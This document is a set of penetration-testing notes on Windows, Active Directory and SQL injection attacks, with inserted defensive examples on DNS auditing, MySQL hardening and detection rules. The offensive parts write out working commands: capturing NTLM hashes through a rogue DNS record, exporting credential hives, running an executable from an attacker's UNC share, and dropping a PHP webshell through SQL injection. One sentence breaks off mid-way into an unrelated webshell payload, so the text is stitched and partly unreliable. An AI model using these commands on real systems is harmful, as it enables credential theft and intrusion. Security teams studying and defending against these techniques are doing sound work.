Always use ffuf for fuzzing files and gobuster for fuzzing directories.
If a local privilege escalation exists on a Windows system for a service listening on an internal port, and the exploit is written in Python or Bash, forward that service port and run the exploit from Kali.
In an Active Directory environment, if we want to pivot to an internal Windows host from a compromised Windows host, check whether the attacking host can receive a reverse connection on port 53, since AD is usually configured to allow DNS (port 53) traffic out to external hosts. eg:
Adding a DNS entry in an AD environment to steal NTLM hashes
Active Directory has a feature called ADIDNS (Active Directory Integrated DNS), in which AD users can point computer account objects they control at an arbitrary IP address. An attacker who has compromised a regular domain user can abuse this by adding a DNS A record (an Address record, which maps a name to an IP address) that points to an address where Responder is listening. The hash is captured when someone visits that name, or when a script set up by the IT team checks that all web sites in the AD are up and running, as in the Intelligence box from Hack The Box shown below.
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        # The status code must be read from the $request object; the bare ".StatusCode" in the original never evaluates
        if($request.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}
Here an attacker who has compromised a regular domain user can add a DNS A record pointing to their own IP address where Responder is listening. Because the IT team's script above requests every web* DNS name with Invoke-WebRequest -UseDefaultCredentials, the NTLM hash of the account running the script is sent to the attacker's listener. For this we can use https://github.com/Sagar-Jangam/DNSUpdate
python3 DNSUpdate.py -DNS <DC-IP> -u 'htb.local\<username>' -p <password> -a ad -r webalex -d <attacker-ip>
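The defensive counterpart to the attack above is auditing what is actually in the AD-integrated zone. The following is an added example and is not code from the original notes or from the DNSUpdate project: it parses raw dnsRecord attribute values as they come back from the MicrosoftDNS container the script above enumerates (the field layout is the one documented in MS-DNSP) and flags A records that resolve outside the networks the organisation owns. The zone contents, owner names and the allowed range 10.10.10.0/24 are constructed for the example; 192.0.2.10 is a documentation address standing in for an attacker-controlled host.

```python
import ipaddress
import struct
from datetime import datetime, timedelta, timezone

# Layout of one dnsRecord attribute value (MS-DNSP 2.3.2.2), little-endian unless noted:
#   DataLength(2) Type(2) Version(1) Rank(1) Flags(2) Serial(4)
#   TtlSeconds(4, big-endian) Reserved(4) TimeStamp(4) Data(DataLength)
_HEAD = struct.Struct("<HHBBHL")   # DataLength .. Serial (12 bytes)
_TTL = struct.Struct(">L")         # TtlSeconds is stored big-endian
_TAIL = struct.Struct("<LL")       # Reserved, TimeStamp (hours since 1601-01-01 UTC, 0 = static)
HEADER_LEN = _HEAD.size + _TTL.size + _TAIL.size  # 24
TYPE_A = 1
RANK_ZONE = 0xF0


def build_a_record(ip, ttl=600, serial=1, timestamp_hours=0):
    """Build a dnsRecord blob for an A record. Used here only to construct sample data."""
    data = ipaddress.IPv4Address(ip).packed
    return (_HEAD.pack(len(data), TYPE_A, 5, RANK_ZONE, 0, serial)
            + _TTL.pack(ttl) + _TAIL.pack(0, timestamp_hours) + data)


def parse_dns_record(blob):
    """Return (type, ttl, timestamp_hours, data) from a raw dnsRecord blob."""
    if len(blob) < HEADER_LEN:
        raise ValueError("dnsRecord too short")
    data_len, rtype, _ver, _rank, _flags, _serial = _HEAD.unpack_from(blob, 0)
    (ttl,) = _TTL.unpack_from(blob, _HEAD.size)
    _reserved, timestamp_hours = _TAIL.unpack_from(blob, _HEAD.size + _TTL.size)
    data = blob[HEADER_LEN:HEADER_LEN + data_len]
    if len(data) != data_len:
        raise ValueError("dnsRecord data truncated")
    return rtype, ttl, timestamp_hours, data


def record_time(timestamp_hours):
    """Convert the TimeStamp field to a datetime; None for static (non-aging) records."""
    if timestamp_hours == 0:
        return None
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(hours=timestamp_hours)


def audit_a_records(records, allowed_networks):
    """records: iterable of (owner name, dnsRecord bytes). Flag A records outside allowed ranges."""
    nets = [ipaddress.ip_network(n) for n in allowed_networks]
    findings = []
    for name, blob in records:
        rtype, ttl, ts, data = parse_dns_record(blob)
        if rtype != TYPE_A:
            continue
        ip = ipaddress.IPv4Address(data)
        if not any(ip in net for net in nets):
            findings.append({"name": name, "ip": str(ip), "ttl": ttl,
                             "created": record_time(ts)})
    return findings


# Constructed sample zone dump: three "web*" owners like the ones the status script
# iterates over. The first two point into the corporate range; "webalex" was added by
# a regular domain user and points to an outside address (192.0.2.10 is a test address).
SAMPLE_ZONE = [
    ("web01", build_a_record("10.10.10.5")),
    ("web02", build_a_record("10.10.10.6")),
    ("webalex", build_a_record("192.0.2.10", ttl=180, timestamp_hours=3_700_000)),
]

if __name__ == "__main__":
    for finding in audit_a_records(SAMPLE_ZONE, ["10.10.10.0/24"]):
        print(finding)
```

A dynamically registered record carries a non-zero TimeStamp, so the `created` field tells you roughly when the entry appeared; static records created by administrators show `None`. The root cause worth fixing is the zone ACL: by default Authenticated Users may create child objects in AD-integrated zones, so any domain account can register names, and restricting that right (or at least alerting on new records outside owned ranges) removes the precondition for this attack.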
Enabling PS-Remoting
With an elevated PowerShell prompt on the victim host, we can force PowerShell to enable WinRM remoting.
If we need to transfer a binary or executable file via FTP, always run the binary command first, then put file.exe.
If Mimikatz doesn't work on the host, we can save the SAM, SYSTEM and SECURITY hives, transfer them to our attacking machine via SMB, and use secretsdump.py to extract all hashes:
reg save hklm\sam c:\windows\temp\sam.save
reg save hklm\security c:\windows\temp\security.save
reg save hklm\system c:\windows\temp\system.save
Windows can execute executable files directly from a UNC path
cmd /c \\192.168.119.233\hello\shell.exe
The binary is executed directly from the share.
TCP port scan on old Linux systems where nmap does not run (may need to be run more than once to filter out bad results):
nc -w 1 -zv <ip> 1-65535 2>&1 | grep succeeded
UDP port scan on old Linux systems where nmap does not run (may need to be run more than once to filter out bad results):
nc -w 2 -v -u <ip> 1-65535 2>&1 | grep succeeded
Change an SMB password remotely from Linux
smbpasswd -r 10.10.10.193 -U tlavel
Bypass UAC
The fodhelper PowerShell script can be used to bypass UAC, but only if the compromised user is a member of the local Administrators group.
PowerShell command history file location
\AppData\Roaming\Microsoft\Windows\Powershell\
If PowerShell errors out while running PrivEsc scripts (e.g. "Access to the path is denied", "operation might require other privileges", etc.),
check whether the architecture of the reverse shell process matches the host, i.e. a 64-bit process on a 64-bit host and a 32-bit process when the shell was started as 32-bit:
[environment]::Is64BitOperatingSystem
[environment]::Is64BitProcess
If the host is 64-bit and our process is 32-bit, or vice versa, make sure to catch the reverse shell via
union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/rev-shell.php'
MySQL injection: load_file() to read system files
' UNION SELECT NULL,NULL,NULL,load_file('/etc/passwd');--
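Both the INTO OUTFILE webshell drop and the load_file() read above depend on the database account holding the FILE privilege and on the server allowing file I/O to arbitrary paths. The fragment below is an added example, not configuration from the original notes: it shows the permissive my.cnf / my.ini setting beside the hardened alternatives (secure_file_priv and the meaning of empty, NULL and directory values are documented MySQL server settings; the directory path is a constructed placeholder).

```ini
# Weak: an empty secure_file_priv puts no restriction on LOAD_FILE() and
# SELECT ... INTO OUTFILE, so an injection point in the web app can read
# /etc/passwd or write a .php file into the web root.
[mysqld]
secure_file_priv = ""

# Hardened (preferred): NULL disables server-side file import and export
# entirely, so neither primitive is available regardless of privileges.
[mysqld]
secure_file_priv = NULL

# Hardened (if bulk import/export is genuinely needed): confine file I/O to
# one directory that the web server does not serve. Placeholder path.
[mysqld]
secure_file_priv = /var/lib/mysql-files
```

Independently of the server setting, the account the web application connects with should never hold FILE (revoke it with REVOKE FILE ON *.* FROM the application user), and the MySQL service account should have no write access to the web root; with either control in place the OUTFILE step fails even when the injection itself succeeds.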
Wireshark Group
If our compromised user is in the wireshark group, we can sniff packets on any available interface of the compromised host. Below we are sniffing on the loopback interface and saving the capture as test.pcap:
[alex@websrv01 ~]$ id
uid=1002(alex) gid=1002(alex) groups=1002(alex),994(wireshark)
[alex@websrv01 ~]$ dumpcap -i lo -w test.pcap
Enabling WDigest authentication forces the system to keep credentials in plaintext, so the next time an employee logs in their credentials are cached in memory.
This technique is usually applied in real-world red teaming.
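Each of the host-level actions in these notes leaves a distinct trace that a defender can alert on: the reg save of the SAM, SECURITY and SYSTEM hives, a binary launched from a UNC path, and the registry change that turns WDigest plaintext caching back on. The following is an added example, not code from the original notes: three small rules run over constructed process-creation and registry-value-set events modelled on Sysmon field names (EventID 1 and 13, Image, CommandLine, TargetObject, Details). The events, paths and values are constructed for the example; the 192.168.119.233 share is the one used in the UNC example above.

```python
import re

# Constructed sample events modelled on Sysmon fields: EventID 1 = process creation,
# EventID 13 = registry value set. These are not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\sam c:\windows\temp\sam.save"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c \\192.168.119.233\hello\shell.exe"},
    {"EventID": 1, "Image": r"\\192.168.119.233\hello\shell.exe",
     "CommandLine": r"\\192.168.119.233\hello\shell.exe"},
    {"EventID": 13,
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13,
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\check-web.ps1"},
]

# reg.exe exporting one of the three hives that secretsdump.py consumes
HIVE_SAVE = re.compile(r"\breg(?:\.exe)?\b.*\bsave\b.*\bhklm\\(?:sam|security|system)\b", re.I)
# an executable referenced by UNC path (\\host\share\...\name.exe) on a command line
UNC_EXE = re.compile(r"\\\\[^\\\s]+\\[^\s]+\.exe\b", re.I)
# the value that re-enables plaintext credential caching for WDigest (compared lower-case)
WDIGEST_VALUE = r"\securityproviders\wdigest\uselogoncredential"


def detect(event):
    """Return the names of the rules that fire on a single event."""
    hits = []
    if event.get("EventID") == 1:
        image = event.get("Image", "")
        cmd = event.get("CommandLine", "")
        if HIVE_SAVE.search(cmd):
            hits.append("credential_hive_export")
        # either the process image itself lives on a share, or the command line points at one
        if image.startswith("\\\\") or UNC_EXE.search(cmd):
            hits.append("unc_path_execution")
    elif event.get("EventID") == 13:
        target = event.get("TargetObject", "").lower()
        details = event.get("Details", "").strip().lower()
        if target.endswith(WDIGEST_VALUE) and details.endswith("(0x00000001)"):
            hits.append("wdigest_plaintext_enabled")
    return hits


def run_detections(events):
    """Apply detect() to every event; return (event index, rule name) pairs."""
    return [(i, rule) for i, ev in enumerate(events) for rule in detect(ev)]


if __name__ == "__main__":
    for index, rule in run_detections(SAMPLE_EVENTS):
        print(f"event {index}: {rule}")
```

The WDigest rule only fires on a transition to 1: since Windows 8.1 / Server 2012 R2 the value defaults to 0 (plaintext caching off), so a set to 1 on a workstation or server is a strong signal on its own, while the reg query and the scheduled PowerShell job in the sample stay silent. In practice the same functions would be fed from parsed Sysmon XML or a SIEM export rather than the inline list.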
If we have low-privileged access on a Windows host and obtain credentials for another user or an administrator, but port 445 is closed externally so we cannot use psexec, and WinRM, RDP and other services are also closed; Enter-PSSession and Invoke-Command -ComputerName did not work; and RunasCs or runas.exe also failed, there are two other ways.
First way
We can create a PowerShell credential object for that user from their password and use Start-Process in PowerShell with a PowerShell reverse shell to get a shell as that user. On the compromised host, create the PowerShell credential object for that user.
We will receive a reverse shell as the user whose credentials we obtained.
Second way
If port 445, WinRM, RDP or any other port through which we can gain access is listening internally, we can forward that port to our local machine and run psexec.py, evil-winrm or an RDP client to get a shell or access as the other user.